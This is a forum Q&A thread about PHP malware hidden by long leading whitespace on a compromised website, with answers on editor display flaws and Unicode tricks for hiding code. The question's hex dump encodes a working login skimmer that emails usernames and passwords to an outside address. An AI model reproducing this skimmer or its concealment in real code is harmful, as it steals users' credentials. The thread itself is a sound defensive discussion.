Malicious code somehow hidden with whitespace?

Question

I recently came across a php file on a compromised website that had what appeared (in Sublime Text) to be a huge white-space gap. When I run a diff against the original source file I can clearly see the malicious code which is snagging logins and passwords and emailing them to someone.

The malicious code can also be clearly seen using vim.

My assumption is that this is some kind of encoding exploit but I can't for the life of me figure out how it's being hidden and I've never seen anything like this before.

Is anyone familiar with this kind of hidden code exploit? Is there a way to make it visible inside Sublime? I realize it may be difficult to say without seeing the file - I am happy to provide said file if need be.

EDIT - Hex dump as requested:

0000000 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
*
00000c0 20 20 20 20 20 20 20 20 20 69 66 28 24 74 68 69
00000d0 73 2d 3e 75 73 65 72 2d 3e 6c 6f 67 69 6e 28 24
00000e0 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70
00000f0 6f 73 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2c
0000100 20 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d
0000110 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 27
0000120 5d 29 29 7b 24 73 6d 61 69 6c 3d 24 5f 53 45 52
0000130 56 45 52 5b 27 48 54 54 50 5f 48 4f 53 54 27 5d
0000140 2e 24 5f 53 45 52 56 45 52 5b 27 52 45 51 55 45
0000150 53 54 5f 55 52 49 27 5d 2e 22 7c 22 2e 24 74 68
0000160 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 6f 73
0000170 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2e 22 7c
0000180 22 2e 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74
0000190 2d 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64
00001a0 27 5d 3b 6d 61 69 6c 28 22 61 6c 74 2e 65 69 2d
00001b0 36 6f 6b 36 77 36 76 32 40 79 6f 70 6d 61 69 6c
00001c0 2e 63 6f 6d 22 2c 24 5f 53 45 52 56 45 52 5b 27
00001d0 48 54 54 50 5f 48 4f 53 54 27 5d 2c 24 73 6d 61
00001e0 69 6c 2c 22 46 72 6f 6d 3a 20 61 64 6d 69 6e 40
00001f0 66 6c 79 2e 63 6f 6d 5c 72 5c 6e 52 65 70 6c 79
0000200 2d 74 6f 3a 20 61 6c 74 2e 65 69 2d 36 6f 6b 36
0000210 77 36 76 32 40 79 6f 70 6d 61 69 6c 2e 63 6f 6d
0000220 22 29 3b
0000223

Answer 1

The code is exploiting a flaw in Sublime to prevent text from being displayed.

This is what part of the code looks like in Notepad++. It is obviously looking for post['username'] and post['password'].

And Notepad++ can handle even 7000 characters when word wrapping:

The flaw is due to Sublime's incorrect word wrap behavior. The 200 leading spaces indents the text far off the screen while also disabling the horizontal scrollbar due to "word wrap", but it actually isn't wrapping any of the text due to treating the 200 spaces as an indent. Zooming out or turning off word wrap would've displayed the text fine.

Sublime has its own HexViewer and that has no problems displaying the code on the ASCII panel:

Answer 2

This is a very old story:

• https://trojansource.codes/
• https://en.wikipedia.org/wiki/Trojan_Source
• https://lwn.net/Articles/874951/
• https://www.bleepingcomputer.com/news/security/invisible-characters-could-be-hiding-backdoors-in-your-javascript-code/
• https://trojansource.codes/trojan-source.pdf
• https://developers.redhat.com/articles/2022/01/12/prevent-trojan-source-attacks-gcc-12

In short there are certain unicode symbols which allow to hide code from certain text editors. If your text editor doesn't know how to deal with these attacks, I'd highly recommend using something different.

Answer 3

There are several Unicode characters that are not visible. The space character obviously and the non-breaking space are quite commonly used. But there are more, and some may be allowed in programming languages that support unicode in source code. For example in Swift it is possible to have a valid variable name that is just invisible (I haven't checked C++, Java, C# and so on but they may be the same). Worst case, you see a single "=" character, and it is really an assignment from one variable with an invisible name to another.

There are also several pairs of Unicode characters that look exactly the same. For example uppercase A and uppercase greek alpha. You have the same problem there. That's probably even more dangerous, because you see code that looks valid (it is actually valid) but you don't realise it's dangerous - with invisible variable names, you can see that obviously something is dodgy.

Finally, there are Unicode characters that can be formed from multiple Unicode code points in different ways. For example there is a code point "lowercase letter e with dieresis" ë and two code points "lowercase letter e" followed by "modifier dieresis" which looks exactly the same. To your programming language they might be the same and to your text editor they might be different, or the other way round.

In your example you just have plenty of whitespace. With some editors for programming, lots of whitespace might force code to be off your display. Without text wrapping, if your editor shows 100 characters, and I start a line with 100 space characters, the actually interesting code might be outside your window and invisible.

Now the good thing: All these problems are just causing malicious code to pass visual inspection. Most malicious code is never looked at by anyone, so there is only little additional risk added. Most people would never have looked at your php code at all.

Any automatic tools examining code should not be tricked by most of these, without any special measures, with the exception of having different Unicode code points for the same character. Any such tool should reject any invalid UTF-8, and convert any unicode characters with different representations into a normalised representation, as soon as any supposed utf-8 data comes in, and throw out the original.